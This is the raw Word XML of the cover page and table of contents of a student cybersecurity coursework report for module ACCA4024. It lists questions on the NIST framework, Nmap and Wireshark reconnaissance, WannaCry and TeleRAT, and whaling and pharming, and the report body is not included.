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14689026"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="23B9E81E" w14:textId="51C6699C" w:rsidR="00A169A5" w:rsidRPr="006010C3" w:rsidRDefault="00A169A5">
          <w:r w:rsidRPr="006010C3">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E0A8C35" wp14:editId="65B1A7C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05338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Pr="006010C3">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B7DF439" wp14:editId="5A0F2F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883AE7" w14:textId="13378AF4" w:rsidR="00A169A5" w:rsidRDefault="00A169A5">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Kara Thomas (2304862)</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="2C489659" w14:textId="0FFD81BF" w:rsidR="00A169A5" w:rsidRDefault="0092143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169A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7DF439"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883AE7" w14:textId="13378AF4" w:rsidR="00A169A5" w:rsidRDefault="00A169A5">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Kara Thomas (2304862)</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="2C489659" w14:textId="0FFD81BF" w:rsidR="00A169A5" w:rsidRDefault="0092143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169A5">
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="18"/>
                                  <w:szCs w:val="18"/>
                                </w:rPr>
                                <w:t xml:space="preserve">     </w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidRPr="006010C3">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BFE742B" wp14:editId="43CE5B6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EC47C7" w14:textId="78EBF322" w:rsidR="00A169A5" w:rsidRDefault="00921435" w:rsidP="005A60D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A60D9" w:rsidRPr="005A60D9">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>Analyse the networks and</w:t>
                                    </w:r>
                                    <w:r w:rsidR="005A60D9">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:br/>
                                    </w:r>
                                    <w:r w:rsidR="005A60D9" w:rsidRPr="005A60D9">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>discuss its security posturesReport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8A8657" w14:textId="758B0F49" w:rsidR="00A169A5" w:rsidRDefault="00D64C9E">
                                    <w:pPr>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:smallCaps/>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00D64C9E">
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t>ACCA4024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FE742B"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6EC47C7" w14:textId="78EBF322" w:rsidR="00A169A5" w:rsidRDefault="00921435" w:rsidP="005A60D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A60D9" w:rsidRPr="005A60D9">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>Analyse the networks and</w:t>
                              </w:r>
                              <w:r w:rsidR="005A60D9">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:br/>
                              </w:r>
                              <w:r w:rsidR="005A60D9" w:rsidRPr="005A60D9">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>discuss its security posturesReport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8A8657" w14:textId="758B0F49" w:rsidR="00A169A5" w:rsidRDefault="00D64C9E">
                              <w:pPr>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:smallCaps/>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00D64C9E">
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>ACCA4024</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="0F4CD9C2" w14:textId="7A512944" w:rsidR="00A169A5" w:rsidRPr="006010C3" w:rsidRDefault="00A169A5">
          <w:r w:rsidRPr="006010C3">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-514150694"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="46A56A9F" w14:textId="7FD3854D" w:rsidR="00C7109A" w:rsidRPr="006010C3" w:rsidRDefault="00C7109A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r w:rsidRPr="006010C3">
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="23F6FE25" w14:textId="3DCE422E" w:rsidR="004D5D05" w:rsidRDefault="00C7109A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="006010C3">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc165489676" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489676 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5580AA4E" w14:textId="42EED832" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489677" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 1:</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489677 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44125C82" w14:textId="06202FA8" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489678" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Based on the provided background and introduction given, in light of the evolving challenges and opportunities in the field of cybersecurity, explain how the NIST Cybersecurity Framework plays a vital role in achieving the dominant objective of safeguarding digital assets and personal data in today's society.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489678 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F73CFD4" w14:textId="63E77DC8" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489679" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b) As stated in the introduction, Reconnaissance is the first stage in the “cyber kill chain” used by cybercriminals to gather pertinent information about their target How can the tools Nmap and Wireshark be utilized in the reconnaissance stage of a cyber-attack? Please conduct research on these tools and provide an example of how each tool contributes to gathering pertinent information about a target.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489679 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68F8C15E" w14:textId="210956C7" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489680" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c) Cyber – Attacks and Mitigations strategies</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489680 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A1F2CAF" w14:textId="0F72CF88" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489681" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i) Explain how the malware examples WannaCry and TeleRAT operate and discuss effective</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489681 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="090200E1" w14:textId="74A014FD" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489682" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mitigation strategies for each.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489682 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CE88045" w14:textId="088A21D3" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489683" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii) Describe the implementation of the phishing attacks known as Whaling and Pharming and</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489683 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E8DAA4F" w14:textId="32B83252" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489684" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>discuss effective strategies to mitigate the risks associated with them.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489684 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BCB9155" w14:textId="37F93DE4" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489685" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 2:</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489685 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B9354CD" w14:textId="2A17B548" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
